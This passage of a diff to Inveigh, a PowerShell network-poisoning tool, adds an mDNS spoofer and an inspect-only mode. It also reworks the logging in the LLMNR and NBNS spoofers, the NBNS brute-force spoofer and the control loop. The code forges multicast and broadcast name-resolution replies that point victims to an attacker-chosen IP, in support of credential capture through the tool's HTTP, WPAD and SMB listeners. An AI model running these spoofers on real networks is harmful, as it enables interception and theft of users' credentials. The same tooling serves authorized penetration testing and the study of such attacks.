if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") + } + } } + } } @@ -2531,7 +2916,17 @@ $sniffer_scriptblock = { $inveigh.valid_host_list.Add($LLMNR_query_string) $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR response $LLMNR_response_IP for $LLMNR_query_string received from $source_IP - $LLMNR_query_string added to valid host list") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR response $LLMNR_response_IP for $LLMNR_query_string received from $source_IP - $LLMNR_query_string added to valid host list")]) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR response $LLMNR_response_IP for $LLMNR_query_string received from $source_IP - $LLMNR_query_string added to valid host list") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - LLMNR response $LLMNR_response_IP for $LLMNR_query_string received from $source_IP - $LLMNR_query_string added to valid host list") + } + } } @@ -2551,9 +2946,10 @@ $sniffer_scriptblock = $memory_stream.Close() } +# Unprivileged LLMNR Spoofer ScriptBlock $LLMNR_spoofer_scriptblock = { - param ($LLMNR_response_message,$SpooferIP,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$LLMNRTTL) + param ($Inspect,$LLMNR_response_message,$SpooferIP,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$LLMNRTTL) $LLMNR_running = $true $LLMNR_listener_endpoint = New-object System.Net.IPEndPoint ([IPAddress]::Any,5355) @@ -2565,23 +2961,44 @@ $LLMNR_spoofer_scriptblock = catch { $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting LLMNR spoofer") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting LLMNR spoofer")]) $LLMNR_running = $false + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting LLMNR spoofer") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Error starting LLMNR spoofer") + } + } $LLMNR_multicast_group = [IPAddress]"224.0.0.252" $LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group) $LLMNR_UDP_client.Client.ReceiveTimeout = 5000 + $LLMNR_TTL_bytes = [System.BitConverter]::GetBytes($LLMNRTTL) + [Array]::Reverse($LLMNR_TTL_bytes) while($inveigh.running -and $LLMNR_running) { - $LLMNR_request_data = $LLMNR_UDP_client.Receive([Ref]$LLMNR_listener_endpoint) # need to switch to async + try + { + $LLMNR_request_data = $LLMNR_UDP_client.Receive([Ref]$LLMNR_listener_endpoint) + } + catch + { + $LLMNR_UDP_client.Close() + $LLMNR_UDP_client = new-Object System.Net.Sockets.UdpClient 5355 + $LLMNR_multicast_group = [IPAddress]"224.0.0.252" + $LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group) + $LLMNR_UDP_client.Client.ReceiveTimeout = 5000 + } - if([System.BitConverter]::ToString($LLMNR_request_data[($LLMNR_request_data.Length - 4)..($LLMNR_request_data.Length - 3)]) -ne '00-1c') # ignore AAAA for now + if($LLMNR_request_data -and [System.BitConverter]::ToString($LLMNR_request_data[($LLMNR_request_data.Length - 4)..($LLMNR_request_data.Length - 3)]) -ne '00-1c') # ignore AAAA for now { - $LLMNR_TTL_bytes = [System.BitConverter]::GetBytes($LLMNRTTL) - [Array]::Reverse($LLMNR_TTL_bytes) $LLMNR_response_packet = $LLMNR_request_data[0,1] + 0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00 + @@ -2594,7 +3011,7 @@ $LLMNR_spoofer_scriptblock = $LLMNR_query_string = [Text.Encoding]::UTF8.GetString($LLMNR_request_data[13..($LLMNR_request_data[12] + 12)]) $source_IP = $LLMNR_listener_endpoint.Address.IPAddressToString - if(($LLMNR_request_data -and $LLMNR_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and ( + if(!$Inspect -and ($LLMNR_request_data -and $LLMNR_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and ( !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ( $inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP)) { @@ -2611,7 +3028,11 @@ $LLMNR_spoofer_scriptblock = else { - if($SpooferHostsReply -and $SpooferHostsReply -notcontains $LLMNR_query_string) + if($Inspect) + { + $LLMNR_response_message = "- inspect only" + } + elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $LLMNR_query_string) { $LLMNR_response_message = "- $LLMNR_query_string is not on reply list" } @@ -2641,10 +3062,20 @@ $LLMNR_spoofer_scriptblock = if($LLMNR_request_data) { $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")]) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") + } + } - $LLMNR_request_data = "" + $LLMNR_request_data = "" } } @@ -2652,9 +3083,236 @@ $LLMNR_spoofer_scriptblock = $LLMNR_UDP_client.Close() } +# Unprivileged mDNS Spoofer ScriptBlock +$mDNS_spoofer_scriptblock = +{ + param ($Inspect,$mDNS_response_message,$mDNSTTL,$mDNSTypes,$SpooferIP,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore) + + $mDNS_running = $true + $mDNS_listener_endpoint = New-object System.Net.IPEndPoint ([IPAddress]::Any,5353) + + try + { + $mDNS_UDP_client = New-Object System.Net.Sockets.UdpClient 5353 + } + catch + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting mDNS spoofer") + $mDNS_running = $false + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting mDNS spoofer") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Error starting mDNS spoofer") + } + + } + + $mDNS_multicast_group = [IPAddress]"224.0.0.251" + $mDNS_UDP_client.JoinMulticastGroup($mDNS_multicast_group) + $mDNS_UDP_client.Client.ReceiveTimeout = 5000 + $mDNS_TTL_bytes = [System.BitConverter]::GetBytes($mDNSTTL) + [Array]::Reverse($mDNS_TTL_bytes) + + while($inveigh.running -and $mDNS_running) + { + + try + { + $mDNS_request_data = $mDNS_UDP_client.Receive([Ref]$mDNS_listener_endpoint) + } + catch + { + $mDNS_UDP_client.Close() + $mDNS_UDP_client = new-Object System.Net.Sockets.UdpClient 5353 + $mDNS_multicast_group = [IPAddress]"224.0.0.251" + $mDNS_UDP_client.JoinMulticastGroup($mDNS_multicast_group) + $mDNS_UDP_client.Client.ReceiveTimeout = 5000 + } + + if([System.BitConverter]::ToString($mDNS_request_data) -like '*-00-01-80-01') + { + $mDNS_response_packet = $mDNS_request_data[0,1] + + 0x84,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00 + + $mDNS_request_data[12..($mDNS_request_data.Length - 5)] + + 0x00,0x01,0x00,0x01 + + $mDNS_TTL_bytes + + 0x00,0x04 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + + $mDNS_query_string = DataToString 13 $mDNS_request_data[12] $mDNS_request_data + $mDNS_query_string_full = $mDNS_query_string + ".local" + $source_IP = $mDNS_listener_endpoint.Address.IPAddressToString + + if(!$Inspect -and ($mDNS_request_data -and $mDNS_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $mDNS_query_string) -and ( + !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $mDNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ( + $mDNSTypes -contains 'QU') -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP)) + { + $mDNS_destination_endpoint = New-Object Net.IPEndpoint($mDNS_listener_endpoint.Address,$mDNS_listener_endpoint.Port) + $mDNS_UDP_client.Connect($mDNS_destination_endpoint) + $mDNS_UDP_client.Send($mDNS_response_packet,$mDNS_response_packet.Length) + $mDNS_UDP_client.Close() + $mDNS_UDP_client = new-Object System.Net.Sockets.UdpClient 5353 + $mDNS_multicast_group = [IPAddress]"224.0.0.251" + $mDNS_UDP_client.JoinMulticastGroup($mDNS_multicast_group) + $mDNS_UDP_client.Client.ReceiveTimeout = 5000 + $mDNS_response_message = "- response sent" + } + else + { + + if($Inspect) + { + $mDNS_response_message = "- inspect only" + } + elseif($mDNSTypes -notcontains 'QU') + { + $mDNS_response_message = "- disabled mDNS type" + } + elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $mDNS_query_string) + { + $mDNS_response_message = "- $mDNS_query_string is not on reply list" + } + elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $mDNS_query_string) + { + $mDNS_response_message = "- $mDNS_query_string is on ignore list" + } + elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP) + { + $mDNS_response_message = "- $source_IP is not on reply list" + } + elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP) + { + $mDNS_response_message = "- $source_IP is on ignore list" + } + elseif($inveigh.IP_capture_list -contains $source_IP) + { + $mDNS_response_message = "- previous capture from $source_IP" + } + else + { + $mDNS_response_message = "- something went wrong" + } + + } + + if($mDNS_request_data) + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message") + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message") + } + + } + + $mDNS_request_data = "" + } + elseif([System.BitConverter]::ToString($mDNS_request_data) -like '*-05-6C-6F-63-61-6C-00-00-01-00-01-*') + { + $mDNS_response_packet = $mDNS_request_data[0,1] + + 0x84,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00 + + $mDNS_request_data[12..($mDNS_request_data[12] + 12)] + + 0x05,0x6c,0x6f,0x63,0x61,0x6c,0x00 + + 0x00,0x01,0x00,0x01 + + $mDNS_TTL_bytes + + 0x00,0x04 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + + $mDNS_query_string = DataToString 13 $mDNS_request_data[12] $mDNS_request_data + $mDNS_query_string_full = $mDNS_query_string + ".local" + $source_IP = $mDNS_listener_endpoint.Address.IPAddressToString + + if(!$Inspect -and ($mDNS_request_data -and $mDNS_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $mDNS_query_string) -and ( + !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $mDNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ( + $mDNSTypes -contains 'QM') -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP)) + { + $mDNS_destination_endpoint = New-Object Net.IPEndpoint([IPAddress]"224.0.0.251",5353) + $mDNS_UDP_client.Connect($mDNS_destination_endpoint) + $mDNS_UDP_client.Send($mDNS_response_packet,$mDNS_response_packet.Length) + $mDNS_UDP_client.Close() + $mDNS_UDP_client = new-Object System.Net.Sockets.UdpClient 5353 + $mDNS_multicast_group = [IPAddress]"224.0.0.251" + $mDNS_UDP_client.JoinMulticastGroup($mDNS_multicast_group) + $mDNS_UDP_client.Client.ReceiveTimeout = 5000 + $mDNS_response_message = "- response sent" + } + else + { + + if($Inspect) + { + $mDNS_response_message = "- inspect only" + } + elseif($mDNSTypes -notcontains 'QM') + { + $mDNS_response_message = "- disabled mDNS type" + } + elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $mDNS_query_string) + { + $mDNS_response_message = "- $mDNS_query_string is not on reply list" + } + elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $mDNS_query_string) + { + $mDNS_response_message = "- $mDNS_query_string is on ignore list" + } + elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP) + { + $mDNS_response_message = "- $source_IP is not on reply list" + } + elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP) + { + $mDNS_response_message = "- $source_IP is on ignore list" + } + elseif($inveigh.IP_capture_list -contains $source_IP) + { + $mDNS_response_message = "- previous capture from $source_IP" + } + else + { + $mDNS_response_message = "- something went wrong" + } + + } + + if($mDNS_request_data) + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message") + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message") + } + + } + + $mDNS_request_data = "" + } + + } + + $mDNS_UDP_client.Close() + } + +# Unprivileged NBNS Spoofer ScriptBlock $NBNS_spoofer_scriptblock = { - param ($NBNS_response_message,$SpooferIP,$NBNSTypes,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$NBNSTTL) + param ($Inspect,$NBNS_response_message,$SpooferIP,$NBNSTypes,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$NBNSTTL) $NBNS_running = $true $NBNS_listener_endpoint = New-Object System.Net.IPEndPoint ([IPAddress]::Broadcast,137) @@ -2666,19 +3324,41 @@ $NBNS_spoofer_scriptblock = catch { $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting NBNS spoofer") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting NBNS spoofer")]) $NBNS_running = $false + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting NBNS spoofer") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Error starting NBNS spoofer") + } + } $NBNS_UDP_client.Client.ReceiveTimeout = 5000 + $NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL) + [Array]::Reverse($NBNS_TTL_bytes) while($inveigh.running -and $NBNS_running) { - $NBNS_request_data = $NBNS_UDP_client.Receive([Ref]$NBNS_listener_endpoint) # need to switch to async + try + { + $NBNS_request_data = $NBNS_UDP_client.Receive([Ref]$NBNS_listener_endpoint) + } + catch + { + $NBNS_UDP_client.Close() + $NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137 + $NBNS_UDP_client.Client.ReceiveTimeout = 5000 + } + $IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address) - if([System.BitConverter]::ToString($NBNS_request_data[10..11]) -ne '00-01') + if($NBNS_request_data -and [System.BitConverter]::ToString($NBNS_request_data[10..11]) -ne '00-01') { $NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL) [Array]::Reverse($NBNS_TTL_bytes) @@ -2760,7 +3440,7 @@ $NBNS_spoofer_scriptblock = } until($n -gt ($NBNS_query_string_subtracted.Length - 1) -or $NBNS_query_string.Length -eq 15) - if (($NBNS_request_data -and $NBNS_listener_endpoint.Address.IPAddressToString -ne '255.255.255.255') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $NBNS_query_string) -and ( + if(!$Inspect -and ($NBNS_request_data -and $NBNS_listener_endpoint.Address.IPAddressToString -ne '255.255.255.255') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $NBNS_query_string) -and ( !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $NBNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ( $inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP) -and ($NBNSTypes -contains $NBNS_query_type) -and ($source_IP -ne $IP)) { @@ -2775,7 +3455,11 @@ $NBNS_spoofer_scriptblock = else { - if($NBNSTypes -notcontains $NBNS_query_type) + if($Inspect) + { + $NBNS_response_message = "- inspect only" + } + elseif($NBNSTypes -notcontains $NBNS_query_type) { $NBNS_response_message = "- disabled NBNS type" } @@ -2813,7 +3497,17 @@ $NBNS_spoofer_scriptblock = if($NBNS_request_data) { $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")]) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") + } + } $NBNS_request_data = "" @@ -2824,6 +3518,7 @@ $NBNS_spoofer_scriptblock = $NBNS_UDP_client.Close() } +# NBNS BruteForce ScriptBlock $NBNS_bruteforce_spoofer_scriptblock = { param ($SpooferIP,$NBNSBruteForceHost,$NBNSBruteForceTarget,$NBNSBruteForcePause,$NBNSTTL) @@ -2863,12 +3558,21 @@ $NBNS_bruteforce_spoofer_scriptblock = 0x00,0x00,0x00,0x00 $inveigh.console_queue.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget")]) $NBNS_paused = $false $NBNS_bruteforce_UDP_client = New-Object System.Net.Sockets.UdpClient(137) $destination_IP = [System.Net.IPAddress]::Parse($NBNSBruteForceTarget) $destination_point = New-Object Net.IPEndpoint($destination_IP,137) $NBNS_bruteforce_UDP_client.Connect($destination_point) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget") + } while($inveigh.running) { @@ -2879,8 +3583,18 @@ $NBNS_bruteforce_spoofer_scriptblock = if($NBNS_paused) { $inveigh.console_queue.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer")]) $NBNS_paused = $false + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer") + } + } for ($i = 0; $i -lt 255; $i++) @@ -2895,9 +3609,19 @@ $NBNS_bruteforce_spoofer_scriptblock = if($inveigh.hostname_spoof -and $NBNSBruteForcePause) { $inveigh.console_queue.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer")]) $NBNS_paused = $true break NBNS_spoofer_loop + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer") + } + } } @@ -2912,9 +3636,10 @@ $NBNS_bruteforce_spoofer_scriptblock = $NBNS_bruteforce_UDP_client.Close() } +# Control Loop ScriptBlock $control_scriptblock = { - param ($NBNSBruteForcePause,$RunCount,$RunTime) + param ($ConsoleQueueLimit,$NBNSBruteForcePause,$RunCount,$RunTime) $inveigh.control = $true @@ -2941,11 +3666,15 @@ $control_scriptblock = catch { $inveigh.console_queue.Add("SSL Certificate Deletion Error - Remove Manually") - $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null if($inveigh.file_output) { - "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") } } @@ -2954,33 +3683,41 @@ $control_scriptblock = Start-Sleep -S 1 $inveigh.console_queue.Add("Inveigh exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message") > $null - Start-Sleep -S 1 - $inveigh.running = $false if($inveigh.file_output) { - "$(Get-Date -format 's') - Inveigh exited due to $exit_message" | Out-File $Inveigh.log_out_file -Append + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message") } + Start-Sleep -S 1 + $inveigh.running = $false + if($inveigh.relay_running) { Start-Sleep -S 1 $inveigh.console_queue.Add("Inveigh Relay exited due to $exit_message at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message") > $null - Start-Sleep -S 1 - $inveigh.relay_running = $false if($inveigh.file_output) { - "$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message" | Out-File $Inveigh.log_out_file -Append + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message") } + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message") + } + + Start-Sleep -S 1 + $inveigh.relay_running = $false + } - $inveigh.HTTP = $false $inveigh.HTTPS = $false - } if($NBNSBruteForcePause) @@ -3070,6 +3807,16 @@ $control_scriptblock = } + if(!$inveigh.console_output -and $ConsoleQueueLimit -ge 0) + { + + while($inveigh.console_queue.Count -gt $ConsoleQueueLimit -and !$inveigh.console_output) + { + $inveigh.console_queue.RemoveAt(0) + } + + } + Start-Sleep -m 5 } @@ -3079,7 +3826,7 @@ $control_scriptblock = # End ScriptBlocks # Begin Startup Functions -# HTTP/HTTPS Listener Startup Function +# HTTP Listener Startup Function function HTTPListener() { $proxy_listener = $false @@ -3094,13 +3841,14 @@ function HTTPListener() $HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($HTTPIP).AddArgument($HTTPPort).AddArgument( $HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument( $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument( - $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null + $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument( + $WPADAuthIgnore).AddArgument($WPADResponse) > $null $HTTP_powershell.BeginInvoke() > $null } Start-Sleep -m 50 -# HTTP/HTTPS Listener Startup Function +# HTTPS Listener Startup Function function HTTPSListener() { $proxy_listener = $false @@ -3115,7 +3863,8 @@ function HTTPSListener() $HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($HTTPIP).AddArgument($HTTPSPort).AddArgument( $HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument( $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument( - $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null + $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument( + $WPADAuthIgnore).AddArgument($WPADResponse) > $null $HTTPS_powershell.BeginInvoke() > $null } @@ -3136,7 +3885,8 @@ function ProxyListener() $HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($ProxyIP).AddArgument($ProxyPort).AddArgument( $HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument( $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument( - $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null + $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument( + $WPADAuthIgnore).AddArgument($WPADResponse) > $null $proxy_powershell.BeginInvoke() > $null } @@ -3150,16 +3900,17 @@ function SnifferSpoofer() $sniffer_powershell.Runspace = $sniffer_runspace $sniffer_powershell.AddScript($shared_basic_functions_scriptblock) > $null $sniffer_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null - $sniffer_powershell.AddScript($sniffer_scriptblock).AddArgument($LLMNR_response_message).AddArgument( - $NBNS_response_message).AddArgument($IP).AddArgument($SpooferIP).AddArgument($SMB).AddArgument( - $LLMNR).AddArgument($NBNS).AddArgument($NBNSTypes).AddArgument($SpooferHostsReply).AddArgument( - $SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument( - $SpooferLearning).AddArgument($SpooferLearningDelay).AddArgument($SpooferLearningInterval).AddArgument( - $RunTime).AddArgument($LLMNRTTL).AddArgument($NBNSTTL) > $null + $sniffer_powershell.AddScript($sniffer_scriptblock).AddArgument($IP).AddArgument($LLMNR).AddArgument( + $LLMNR_response_message).AddArgument($LLMNRTTL).AddArgument($mDNS).AddArgument( + $mDNS_response_message).AddArgument($mDNSTypes).AddArgument($mDNSTTL).AddArgument( + $NBNS).AddArgument($NBNS_response_message).AddArgument($NBNSTypes).AddArgument($NBNSTTL).AddArgument( + $SMB).AddArgument($SpooferHostsIgnore).AddArgument($SpooferHostsReply).AddArgument( + $SpooferIP).AddArgument($SpooferIPsIgnore).AddArgument($SpooferIPsReply).AddArgument( + $SpooferLearning).AddArgument($SpooferLearningDelay).AddArgument($SpooferLearningInterval) > $null $sniffer_powershell.BeginInvoke() > $null } -# LLMNR Spoofer Startup function +# Unprivileged LLMNR Spoofer Startup Function function LLMNRSpoofer() { $LLMNR_spoofer_runspace = [RunspaceFactory]::CreateRunspace() @@ -3168,14 +3919,30 @@ function LLMNRSpoofer() $LLMNR_spoofer_powershell = [PowerShell]::Create() $LLMNR_spoofer_powershell.Runspace = $LLMNR_spoofer_runspace $LLMNR_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null - $LLMNR_spoofer_powershell.AddScript($LLMNR_spoofer_scriptblock).AddArgument( + $LLMNR_spoofer_powershell.AddScript($LLMNR_spoofer_scriptblock).AddArgument($Inspect).AddArgument( $LLMNR_response_message).AddArgument($SpooferIP).AddArgument($SpooferHostsReply).AddArgument( $SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument( $LLMNRTTL) > $null $LLMNR_spoofer_powershell.BeginInvoke() > $null } -# NBNS Spoofer Startup function +# Unprivileged mDNS Spoofer Startup Function +function mDNSSpoofer() +{ + $mDNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace() + $mDNS_spoofer_runspace.Open() + $mDNS_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) + $mDNS_spoofer_powershell = [PowerShell]::Create() + $mDNS_spoofer_powershell.Runspace = $mDNS_spoofer_runspace + $mDNS_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null + $mDNS_spoofer_powershell.AddScript($mDNS_spoofer_scriptblock).AddArgument($Inspect).AddArgument( + $mDNS_response_message).AddArgument($mDNSTTL).AddArgument($mDNSTypes).AddArgument($SpooferIP).AddArgument( + $SpooferHostsReply).AddArgument($SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument( + $SpooferIPsIgnore) > $null + $mDNS_spoofer_powershell.BeginInvoke() > $null +} + +# Unprivileged NBNS Spoofer Startup Function function NBNSSpoofer() { $NBNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace() @@ -3184,14 +3951,14 @@ function NBNSSpoofer() $NBNS_spoofer_powershell = [PowerShell]::Create() $NBNS_spoofer_powershell.Runspace = $NBNS_spoofer_runspace 